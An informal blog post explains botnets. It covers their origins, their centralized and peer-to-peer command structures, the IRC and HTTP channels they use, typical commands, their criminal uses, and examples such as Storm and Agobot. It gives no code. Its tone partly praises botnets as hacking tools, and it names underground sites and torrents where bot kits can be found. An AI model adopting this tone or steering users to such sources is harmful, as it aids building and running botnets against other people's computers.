Ever wonder how hackers are able to do all the stuff they do? Many expert hackers do not just log on to systems using manual processes. They get help from robots. Yes, that’s right – robots. Not your typical idea of a robot though but something that is called as such because they work autonomously and automatically.
Botnet, also known as robotic network, is a group of computers that run the same computer robotic application controlled or manipulated by human operators. They are also called as botmasters for the purpose of doing co-related tasks. The system is organized in a simple hierarchical structure comprised of many computers, also called as drones or zombies, and a command center that controls all of the drones or zombies into action. Botnets can be large (composed of ten to twenty thousand drones) or small (composed of five hundred to a thousand drones). It really depends on the sophistication and complexity of its use.
Botnets are very good tools in the hacking world because of their ability to gain other computers that could be used for any purpose. If you are familiar with the security vulnerabilities of a network, its workstations and servers, you can wrest control all of its computers in a matter of days, hours or even minutes with the aid of a very sophisticated botnet application. Once control is obtained, the task can be done remotely or autonomously.
Knowing who developed the first botnet or the authors of this software can be very vague. I mean, honestly, who would want to claim the software as his if it was the one responsible for hacking the entire computer system of the NSA or the CIA? However, we can actually trace its roots or how it came to be. In 1998, NetBus and BackOrifice2000 application were introduced in the IT community. Both were sets of applications designed for a friendlier Microsoft Windows-based remote systems management. If you haven’t heard of it, it’s like the famous Go-to-my-PC application where you could access your computer at home from almost anywhere and perform any normal tasks as if you are actually using the device. The difference is that it was built as a command base with other additional software for whatever intention and purpose the author has. Some users came up with some ideas on how it could be used maliciously, like in committing pranks and eavesdropping. Over time, additional refinements where made independently by various groups, mutating it to some nasty Malware Trojan or just a milled one.
How are they made?
To know how botnets are made, we must first understand its known architectures. Currently, the most common architectures used in botnets are the following:
- Centralized command and control (C&C) model
Image is taken from. http://www.malwarecity.com/blog/anatomy-of-a-botnet-196.html
This is considered to be the first botnet architecture used. The botmaster may have the option to login to any of C&C server directly or remotely in order to control and communicate with other C&C server and drone computers. The secondary C&C is usually used as a backup just in case the botmaster fails to connect with the first one. The C&C server may not be restricted to just two and is not also only restricted to one network. It can control as many zombies from deferent networks depending on the botnet’s level of sophistication.
- Decentralized, P2P or distributed command and control model.
Image is taken from. http://www.malwarecity.com/blog/anatomy-of-a-botnet-196.html
Considered to be the a versatile architecture because any of the drones can be used as a command center making it harder for anyone to pinpoint its source plus you would not worry of establishing your control with this architechture.
What are the Internet protocols used to establish connections? Almost any. But currently, the Internet Relay Chat (IRC) botnet is still preferred. It is the favorite of any botmaster because it’s lightweight and secure enough to login and control because of its password protection. One example of an IRC-based botnet is Agobot. It has tools like a packet sniffer, keylogger, rootkit, information harvester, smtp and http client and a DoS attack feature. Internet Messaging botnets also appeared latching to AOL, Yahoo Messenger, and MSN services. In August, the social networking site twitter.com was discovered to have a botnet installed. Twitter.com’s used the Hyper Text Tranfer Protocol. Its security team found that it was being used as a C&C. Security teams from Symantec also found a botnet C&C in Google groups this September. It’s dubbed as “trojan.grup.”
How do you make zombies or drones with others computer? It still goes down to the basics of hacking and exploiting the network and all the computer vulnerabilities. This includes human reverse engineering oremail phishing expeditions.
Botnets could carry a wide range of commands and some of the most common are listed below. Take note, these commands may vary from each botnet.
Flood or DDoS – Command Used for DoS attacks.
Spam – Download a template message and send out the messages from your drones.
Proxy – Primarily used to conceal ones identity by relaying traffic through target computer
http.download – Command to download files from the internet.
Who makes them?
Majority of botnet software is freely distributed without any warranty. It is even possible to build one on top of those that are already available commercially. Just take note that this software is largely considered a malware/trojan. Never attempt to install them if you do not have enough knowledge about their applications. Botnets are related to viruses, malware and rootkits.
What are they used for?
Botnets are one of the best tools you could use in order to do what any hacker would want to be doing. You could remotely initiate some form of eavesdropping or pranks, like logging or injecting user keystrokes, screen captures, program launching, file browsing etc. For a broader application, botnets could be used for unethical and unlawful commercial applications such as phishing, sending spam, click frauds in order to up a website’s popularity, information harvesting and planting, command and control on an agency, proxy server alternative to cover tracks while doing research, and lastly, doing denial of service attacks. Botmasters could even sell their botfarms to the highest bidder, usually the mafia or other large criminal organizations.
What are the largest botnets?
The largest known botnet attack ever recorded was Storm in 2007. Recently, another botnet was uncovered that nearly infected two million personal computers in April 2008. Its name though has not been made official. The Storm botnet was generally used for spamming and uses the Kadmelia P2P overlay protocol rather than an IRC network. A rootkit was also present, enabling it to hide its presence. It had the ability to harvest email addresses fromits infected drones.
Some Common Types
The OpenSource community does not support creation and distribution of malicious softwares like botnets. However, you can actually find them on some underground hackers’ websites and even in torrents. You could also look them up in Google. Some of these are: urxbot, spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot and storm.
0 comments:
Post a Comment